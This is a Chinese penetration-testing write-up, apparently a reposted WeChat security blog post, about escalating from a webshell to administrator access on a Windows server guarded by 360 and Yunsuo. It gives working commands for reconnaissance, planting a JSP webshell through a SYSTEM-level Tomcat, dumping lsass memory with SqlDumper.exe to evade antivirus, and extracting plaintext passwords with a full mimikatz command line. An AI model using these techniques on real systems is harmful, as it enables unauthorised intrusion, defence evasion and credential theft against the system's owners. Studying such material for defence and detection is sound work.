文章来源:潇湘信安 作者:Maytersec
开局一个Webshell,先进行简单的信息搜集,查看当前权限,正常的iis权限。
查看版本
wmic OS get Caption,CSDVersion,OSArchitecture,Version
查看软件
wmic product get name,version
因为提前说了有360和云锁。
360全套带云锁,net、net1、netstat不能执行。sql server数据库,但是因为站酷分离,而且cmd被删除,不能执行命令,懒得去突破了。
而且云锁有个最大的特点就是上传的exe不能执行,加上360全套。传上去的基本不行,传微软自带的net也没用,直接秒没。
因为不能穿exe来提权,所以只能先扫下本地有什么端口。webshell+nmap全端口。
开了3389和1433还有3306,但是1433死活找不到密码,碰撞了几个也不行。
发现有好几个tomcat端口,我们很多人应该知道tomcat继承的是system权限或者administrator权限。既然不能用exe提权,我们来用自带的tomcat。
nmap已经扫描出来端口,我们只要找到conf/server.xml文件对应下端口就可以了。
直接去上传个jsp马就行了。
就算是系统权限也是不能执行net net1等等,exe也一样。
所以试了bat导出注册表sam失败了。hta不能执行,powershell失败。所以用了冰蝎自带的meterpreter.
说下sql server自带的工具 SqlDumper.exe是从SQL Server安装目录下提取出来的,功能和Procdump相似,并且也是微软出品的,体积远小于Procdump,也具备一定的免杀功能。
SqlDumper.exe默认存放在C:⧵Program Files⧵Microsoft SQLServer⧵number⧵Shared,number代表SQL Server的版本,参考如下:
可能存在的位置:C:Program FilesMicrosoft SQL Server100SharedSqlDumper.exeC:Program FilesMicrosoft Analysis ServicesAS OLEDB10SQLDumper.exeC:Program Files (x86)Microsoft SQL Server100SharedSqlDumper.exe
SqlDumper.exe利用方式
查看lsass.exe的pidtasklist /svc |findstr lsass.exe584是lsass.exe的pid"C:Program FilesMicrosoft SQL Server100SharedSqlDumper.exe" 584 0 0x01100
利用webshell把SQLDmpr0001.mdmp下载下来,然后使用mimikatz法国神器得到目标主机明文密码。
mimikatz.exe "sekurlsa::minidump SQLDmpr0001.mdmp" "sekurlsa::logonPasswords full" "exit">1.txt
可以使用query user命令看下管理员在不在, 我们直接登入进去。
结束。
5.一次XSS和CSRF的组合拳进攻 (CSRF+JSON)
6.红蓝对抗之溯源
推荐阅读
点个赞、在看、分享,求三连 原文始发于微信公众号(乌雲安全):实战 | 绕过360安全套装+云锁提权案例
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论